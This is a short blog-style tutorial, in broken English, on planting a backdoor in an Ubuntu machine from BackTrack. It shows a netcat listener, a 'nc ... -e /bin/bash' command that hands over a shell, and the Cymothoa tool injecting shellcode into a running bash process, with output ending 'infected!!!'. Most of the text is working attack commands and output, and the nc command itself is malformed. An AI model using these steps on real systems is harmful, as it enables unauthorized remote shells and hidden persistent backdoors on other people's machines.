
Senin, 30 Januari 2012

Revision about Put Cymothoa Using nc On Ubuntu.

first step
 open your terminal and type root@bt: nc -l -v -p 1010
root@bt:~# nc -l -v -p 1010 

it's still process a listening
now ope our ubuntu so open terminal and type : nc 1010 -e /bin/bash

than now back to terminal backtrack and see process of listenning.
root@bt:~# nc -l -v -p 1010
listening on [any] 1010 ... inverse host lookup failed: Unknown server error : Connection timed out
connect to [] from (UNKNOWN) [] 36426

now type ls on backtrack bellow of process listening
ls it's meas we have on ubuntu.  no type ps ax for see about process
we can see from this process about PID of bash.
i get PID 1878
so now we still on ubuntu. using termial for se a directory about cymothoa where it directory a have muve it from backtrack to ubuntu.

root@Hfree-VirtualBox:/home/h_free/Documents# ls
root@Hfree-VirtualBox:/home/h_free/Documents# cd cymothoa/
root@Hfree-VirtualBox:/home/h_free/Documents/cymothoa# ./cymothoa -p 1878 -s 0 -y 1010
[+] attaching to process 1878

 register info:
 eax value: 0xfffffe00     ebx value: 0xffffffff
 esp value: 0xbfd7a244     eip value: 0x594416

[+] new esp: 0xbfd7a240
[+] injecting code into 0x00827000
[+] copy general purpose registers
[+] detaching from 1878

[+] infected!!!

@keep smile & spirit
be fun

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